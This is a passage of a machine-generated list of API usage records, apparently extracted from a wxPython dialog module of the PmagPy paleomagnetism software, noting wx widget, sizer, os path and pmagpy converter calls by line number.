{"api_name": "wx.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 199, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 199, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 201, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 206, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 243, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 243, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 245, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 245, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 249, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 249, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 256, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 261, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 262, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 275, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 276, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 280, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 284, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 290, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 296, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 298, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 298, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 299, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 301, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 301, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 302, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 305, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 315, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 322, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 322, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 326, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 329, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 330, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 333, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 333, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 351, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 364, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 364, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 372, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 372, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 372, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 382, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 392, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 401, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 402, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 416, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 416, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_dir_button", "line_number": 420, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 420, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 434, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 434, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 435, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 435, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 439, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 439, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 442, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.GridBagSizer", "line_number": 448, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 449, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 451, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 451, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMBOBOX", "line_number": 456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 459, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 460, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 463, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 463, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 469, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 469, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 470, "usage_type": "call"}, {"api_name": "wx.GridSizer", "line_number": 471, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 472, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 473, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 474, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 478, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 483, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 484, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 484, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 485, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 486, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 487, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 491, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 495, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 495, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 501, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 501, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 504, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 504, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 507, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 507, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 520, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 521, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 525, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 525, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 547, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 547, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 551, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 558, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 558, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 567, "usage_type": "call"}, {"api_name": "os.path", "line_number": 567, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 571, "usage_type": "call"}, {"api_name": "os.path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 589, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 589, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 700, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 700, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 703, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 705, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 705, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 716, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 716, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 716, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 757, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 757, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 758, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 758, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 761, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 761, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 767, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 770, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 770, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 773, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 773, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 776, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 776, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 780, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 787, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 787, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 790, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 790, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 795, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 795, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 800, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 800, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 807, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 807, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 810, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 810, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 813, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 813, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 814, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 814, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 815, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 818, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 818, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 821, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 821, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 834, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 836, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 837, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 838, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 841, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 854, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 858, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 858, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 944, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 944, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 945, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 945, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 947, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 947, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 950, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 950, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 950, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 950, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 960, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 960, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 961, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 961, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 964, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 964, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 968, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 968, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 971, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 971, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 974, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 974, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 977, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 977, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 981, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 981, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 988, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 988, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 993, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 993, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 996, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 996, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 999, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 999, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1012, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1016, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1034, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1034, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1036, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1098, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1098, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1100, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1100, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1102, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1102, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1105, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1105, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1105, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1115, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1115, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1116, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1119, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1119, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1122, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1123, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1123, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1126, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1126, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1129, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1133, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1133, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 1138, "usage_type": "call"}, 